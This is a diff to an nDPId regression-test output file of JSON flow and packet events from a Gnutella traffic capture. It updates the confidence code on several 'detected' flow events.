@@ -964,42 +964,42 @@ 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1030,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":303,"flow_packet_id":1,"flow_last_seen":90871,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":90871,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4xlIAAIARNMIKAAIPjoSlDXAJd2YAJJzV5\/IxAvsVo43\/HfOSkBgzAwABAAUAAADDglFLQA=="} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":2,"flow_last_seen":90872,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90872,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA6gAAEAGqm3BJf+CCgACD\/CwxIQAuJIBv98bx2AS\/\/+nyQAAAgQFtA=="} 00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1032,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":3,"flow_last_seen":90872,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90872,"pkt":"UlQAEjUCCAAn5uVZCABFAAAogopAAIAGq44KAAIPwSX\/gsSE8LC\/3xvHALiSAlAQ+vDElQAA"} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1033,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":90873,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90873,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.37.255.130","src_port":50308,"dst_port":61616,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe 
Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1033,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":90873,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90873,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.37.255.130","src_port":50308,"dst_port":61616,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1036,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90880,"flow_last_seen":90880,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":90880,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.32.126.214","src_port":28681,"dst_port":59596,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1036,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":304,"flow_packet_id":1,"flow_last_seen":90880,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":90880,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4YpYAAIARjBkKAAIPwSB+1nAJ6MwAJJ5bn1UxAqnqa\/T\/ZYYW3VylAwABAAUAAADDglFLQA=="} 
00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1037,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":2,"flow_last_seen":90882,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90882,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA6sAAEAGxg9gQUTCCgACD4qZxIkAuYwBsqFtYmAS\/\/\/rIgAAAgQFtA=="} 00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1038,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":3,"flow_last_seen":90882,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90882,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoBGJAAIAGRVwKAAIPYEFEwsSJipmyoW1iALmMAlAQ+vAH7wAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1039,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90883,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90883,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.65.68.194","src_port":50313,"dst_port":35481,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1039,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90883,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90883,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.65.68.194","src_port":50313,"dst_port":35481,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1041,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":2,"flow_last_seen":90885,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90885,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA60AAEAGpYEtH5hwCgACD2jjxIsAuoYB181ecmAS\/\/\/cDQAAAgQFtA=="} 00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1042,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":3,"flow_last_seen":90885,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90885,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoe4VAAIAGrawKAAIPLR+YcMSLaOPXzV5yALqGAlAQ+vD42QAA"} 
-00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1043,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90885,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90885,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":50315,"dst_port":26851,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1043,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90885,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90885,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":50315,"dst_port":26851,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00573{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1046,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":302,"flow_packet_id":2,"flow_last_seen":90892,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":149,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":149,"pkt_l4_len":115,"thread_ts_msec":90892,"pkt":"CAAn5uVZUlQAEjUCCABFAACHA68AAEARZkC5u0qtCgACD9DxcAkAc8xj\/3wxAm1gREr\/fw\/7dxmzAwEBAFQAAADx0Lm7Sq0AAAAACAAAAMMCVkNFR1RLR1cDR1VFQQICVVBDAgEJAkRVQ4BRAQE2UCoBbuAAAQAAAAAAAP\/\/C64DVExTQANESFRDAAABglFLRB3BTv4="} 00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1047,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":303,"flow_packet_id":2,"flow_last_seen":90892,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":149,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":149,"pkt_l4_len":115,"thread_ts_msec":90892,"pkt":"CAAn5uVZUlQAEjUCCABFAACHA7AAAEARNxaOhKUNCgACD3dmcAkAc2nw5\/IxAvsVo43\/HfOSkBgzAwEBAFQAAABmd46EpQ0AAAAACAAAAMMCVkNFR1RLR2IDR1VFQQICVVBDAv8HAkRVQ4BRAQE2UCoBBPgcHBMlAAAAAAAAAAEDVExTQANESFRDAAABglFLRFrK9p0="} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1048,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":2,"flow_last_seen":90896,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90896,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA7EAAEAGGR5LQAavCgACDxKHxH4Au4ABJ3TJMGAS\/\/\/xsQAAAgQFtA=="} 
00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1049,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":3,"flow_last_seen":90896,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90896,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo3P5AAIAGv9MKAAIPS0AGr8R+EocndMkwALuAAlAQ+vAOfgAA"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1050,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90743,"flow_last_seen":90897,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90897,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.64.6.175","src_port":50302,"dst_port":4743,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1050,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90743,"flow_last_seen":90897,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90897,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.64.6.175","src_port":50302,"dst_port":4743,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1052,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":2,"flow_last_seen":90899,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90899,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA7MAAEAGUiNhU7eUCgACDyK6xHUAvHoBhjAS2WAS\/\/94KQAAAgQFtA=="} 00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1053,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":3,"flow_last_seen":90899,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90899,"pkt":"UlQAEjUCCAAn5uVZCABFAAAos+9AAIAGIeoKAAIPYVO3lMR1IrqGMBLZALx6AlAQ+vCU9QAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1058,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90739,"flow_last_seen":90905,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90905,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"97.83.183.148","src_port":50293,"dst_port":8890,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1058,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90739,"flow_last_seen":90905,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90905,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"97.83.183.148","src_port":50293,"dst_port":8890,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1062,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":304,"flow_packet_id":2,"flow_last_seen":90907,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":90907,"pkt":"CAAn5uVZUlQAEjUCCABFAAB0A7gAAEARKrzBIH7WCgACD+jMcAkAYGMhn1UxAqnqa\/T\/ZYYW3VylAwEBAEEAAADM6MEgftYIAAAAAAACAMMCVkNFR1RLR2IDR1VFQQICVVBDAgEFAkRVQ4BRAQNUTFNAA0RIVEMAAAGCUUtEmpBNrg=="} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1088,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":2,"flow_last_seen":91051,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":91051,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA8YAAEAGMiyVHKOvCgACD8MkxIcAvm4BvtmXiWAS\/\/8GbQAAAgQFtA=="} 
00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1089,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":3,"flow_last_seen":91052,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":91052,"pkt":"UlQAEjUCCAAn5uVZCABFAAAozKZAAIAG6U4KAAIPlRyjr8SHwyS+2ZeJAL5uAlAQ+vAjOQAA"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1090,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":2,"flow_last_seen":91057,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":91057,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA8cAAEAG2CXL3Mb0CgACDwSqxHsAv2gBodiVp2AS\/\/+P0AAAAgQFtA=="} 00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":3,"flow_last_seen":91057,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":91057,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoTH9AAIAGD3EKAAIPy9zG9MR7BKqh2JWnAL9oAlAQ+vCsnAAA"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1092,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":2,"flow_last_seen":91058,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":91058,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA8gAAEAG\/LTc7pFSCgACD4L3xIIAwGIBECov1GAS\/\/8zjQAAAgQFtA=="} 
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1093,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":91058,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91058,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"149.28.163.175","src_port":50311,"dst_port":49956,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1093,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":91058,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91058,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"149.28.163.175","src_port":50311,"dst_port":49956,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1094,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":3,"flow_last_seen":91058,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":91058,"pkt":"UlQAEjUCCAAn5uVZCABFAAAouGtAAIAGyBQKAAIP3O6RUsSCgvcQKi\/UAMBiAlAQ+vBQWQAA"} 
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90744,"flow_last_seen":91058,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91058,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"220.238.145.82","src_port":50306,"dst_port":33527,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1098,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90742,"flow_last_seen":91059,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91059,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.198.244","src_port":50299,"dst_port":1194,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90744,"flow_last_seen":91058,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91058,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"220.238.145.82","src_port":50306,"dst_port":33527,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1098,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90742,"flow_last_seen":91059,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91059,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.198.244","src_port":50299,"dst_port":1194,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1100,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":2,"flow_last_seen":91062,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":91062,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA8wAAEAG\/T488TDCCgACD1M1xIUAwVwBVNBhD2AS\/\/\/z9wAAAgQFtA=="} 
00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1101,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":3,"flow_last_seen":91062,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":91062,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoxU5AAIAGu78KAAIPPPEwwsSFUzVU0GEPAMFcAlAQ+vAQxAAA"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1102,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":91062,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":91062,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"60.241.48.194","src_port":50309,"dst_port":21301,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1102,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":91062,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":91062,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"60.241.48.194","src_port":50309,"dst_port":21301,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1104,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":2,"flow_last_seen":91074,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":91074,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA84AAEAGXEIOyP\/lCgACD5DCxHYAwlYBrXv\/HGAS\/\/8kxQAAAgQFtA=="} 00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1105,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":3,"flow_last_seen":91074,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":91074,"pkt":"UlQAEjUCCAAn5uVZCABFAAAotiFAAIAGKfIKAAIPDsj\/5cR2kMKte\/8cAMJWAlAQ+vBBkQAA"} 